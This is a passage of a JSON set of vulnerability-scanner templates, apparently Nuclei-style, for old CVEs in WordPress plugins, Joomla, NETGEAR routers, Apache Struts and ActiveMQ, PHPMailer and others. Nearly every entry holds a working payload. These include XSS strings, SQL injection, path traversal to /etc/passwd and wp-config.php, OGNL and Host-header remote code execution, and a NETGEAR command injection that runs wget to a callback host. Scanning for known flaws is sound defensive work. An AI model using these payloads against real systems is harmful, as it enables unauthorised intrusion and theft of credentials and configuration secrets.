Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?redir=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2016-1000134","info":{"name":"WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10940","info":{"name":"WordPress zm-gallery plugin 1.0 SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 302 && status_code_2 == 200 && status_code_3 == 200","contains(body_2, \"[zm_gallery id=\")","contains(body_2, \"<th scope=\\\"row\\\" class=\\\"check-column\\\">\")","!contains(body_3, \"<th scope=\\\"row\\\" class=\\\"check-column\\\">\")"],"condition":"and"}]}]},{"id":"CVE-2016-1555","info":{"name":"NETGEAR WNAP320 Access Point Firmware - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /boardDataWW.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nmacAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23&reginfo=0&writeData=Submit\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2016-10924","info":{"name":"Wordpress Zedna eBook download <1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6277","info":{"name":"NETGEAR Routers - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000133","info":{"name":"WordPress forget-about-shortcode-buttons 1.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10368","info":{"name":"Opsview Monitor Pro - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin_username={{username}}&login_password={{password}}&login=&back=//www.interact.sh&app=OPSVIEW\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2016-1000130","info":{"name":"WordPress e-search <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000138","info":{"name":"WordPress Admin Font Editor <=1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10033","info":{"name":"WordPress PHPMailer < 5.2.18 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n","POST /wp-login.php?action=lostpassword HTTP/1.1\nHost: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nwp-submit=Get+New+Password&redirect_to=&user_login={{username}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["wp-login.php?checkemail=confirm"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2016-3081","info":{"name":"Apache S2-032 Struts - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000137","info":{"name":"WordPress Hero Maps Pro 2.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7552","info":{"name":"Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/logoff.cgi"],"headers":{"Cookie":"session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Memory map"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000126","info":{"name":"WordPress Admin Font Editor <=1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000155","info":{"name":"WordPress WPSOLR <=8.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000152","info":{"name":"WordPress Tidio-form <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000131","info":{"name":"WordPress e-search <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000139","info":{"name":"WordPress Infusionsoft Gravity Forms <=1.5.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain);</script><\"","input type=\"text\" name=\"ContactId\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000127","info":{"name":"WordPress AJAX Random Post <=2.00 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-8527","info":{"name":"Aruba Airwave <8.2.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000136","info":{"name":"WordPress heat-trackr 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3088","info":{"name":"Apache ActiveMQ Fileserver - Arbitrary File Write","severity":"critical"},"requests":[{"raw":["PUT /fileserver/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n\n{{rand1}}\n","GET /fileserver/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1==204","status_code_2==200","contains((body_2), '{{rand1}}')"],"condition":"and"}]}]},{"id":"CVE-2016-6195","info":{"name":"vBulletin <= 4.2.3 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["type=dberror"]},{"type":"status","status":[200,503],"condition":"or"}]}]},{"id":"CVE-2016-4975","info":{"name":"Apache mod_userdir CRLF injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Set-Cookie\\s*?:(?:\\s*?|.*?;\\s*?))(crlfinjection=crlfinjection)(?:\\s*?)(?:$|;)"]}]}]},{"id":"CVE-2016-1000140","info":{"name":"WordPress New Year Firework <=1.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000142","info":{"name":"WordPress MW Font Changer <=4.2.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10956","info":{"name":"WordPress Mail Masta 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd","{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2016-10960","info":{"name":"WordPress wSecure Lite < 2.4 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"],"body":"wsecure_action=update&publish=\";} header(\"{{name}}: CVE-2016-10960\"); class WSecureConfig2 {var $test=\"","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["{{name}}: CVE-2016-10960"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7981","info":{"name":"SPIP <3.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000149","info":{"name":"WordPress Simpel Reserveren <=3.5.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000148","info":{"name":"WordPress S3 Video <=0.983 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script><\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-3344","info":{"name":"Horde Groupware Unauthenticated Admin Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/horde/admin/user.php","{{BaseURL}}/admin/user.php"],"headers":{"Content-Type":"text/html"},"matchers-condition":"and","matchers":[{"type":"word","words":["<title>Horde :: User Administration</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-4385","info":{"name":"Cofax <=2.0RC3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'>\"</script><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-3634","info":{"name":"SAP Web Application Server 6.x/7.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sap/bc/BSp/sap/menu/fameset.htm?sap--essioncmd=close&sapexiturl=https%3a%2f%2finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2005-2428","info":{"name":"Lotus Domino R5 and R6 WebMail - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/names.nsf/People?OpenView"],"matchers-condition":"and","matchers":[{"type":"regex","name":"domino-username","part":"body","regex":["(<a href=\"/names\\.nsf/[0-9a-z\\/]+\\?OpenDocument)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1059","info":{"name":"WordPress Sniplets 1.1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-4668","info":{"name":"Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-2650","info":{"name":"CMSimple 3.1 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1547","info":{"name":"Microsoft OWA Exchange Server 2003 - 'redir.asp' Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/exchweb/bin/redir.asp?URL=https://interact.sh","{{BaseURL}}/CookieAuth.dll?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttps%3A%2F%2Finteract.sh&reason=0"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2008-4764","info":{"name":"Joomla! <=2.0.0 RC2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6080","info":{"name":"Joomla! ionFiles 4.4.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-2398","info":{"name":"AppServ Open Project <=2.5.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=confirm('xss')>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6668","info":{"name":"nweb2fax <=0.2.7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd","{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-5587","info":{"name":"phpPgAdmin <=4.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6172","info":{"name":"Joomla! Component RWCards 3.0.11 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1061","info":{"name":"WordPress Sniplets <=1.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6222","info":{"name":"Joomla! ProDesk 1.0/1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6465","info":{"name":"Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webshell4/login.php?errcode=0&login=\\%22%20onfocus=alert(document.domain);%20autofocus%20\\%22&err=U"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\\\" onfocus=alert(document.domain); autofocus","Please enter login name &amp; password"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6982","info":{"name":"Devalcms 1.4a - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sub menu for: <script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2008-7269","info":{"name":"UC Gateway Investment SiteEngine v5.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api.php?action=logout&forward=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2011-1669","info":{"name":"WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4926","info":{"name":"Adminimize 1.7.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5179","info":{"name":"Skysa App Bar 1.04 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4618","info":{"name":"Advanced Text Widget < 2.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/advanced-text-widget/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"</script><script>alert(document.domain)</script>\")","contains(body_1, \"Advanced Text Widget\")"],"condition":"and"}]}]},{"id":"CVE-2011-3315","info":{"name":"Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5107","info":{"name":"Alert Before Your Post <= 0.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5252","info":{"name":"Orchard 'ReturnUrl' Parameter URI - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/orchard/Users/Account/LogOff?ReturnUrl=%2f%2fhttp://interact.sh%3f"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2011-5265","info":{"name":"Featurific For WordPress 1.6.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5106","info":{"name":"WordPress Plugin Flexible Custom Post Type < 0.1.7 - Cross-Site 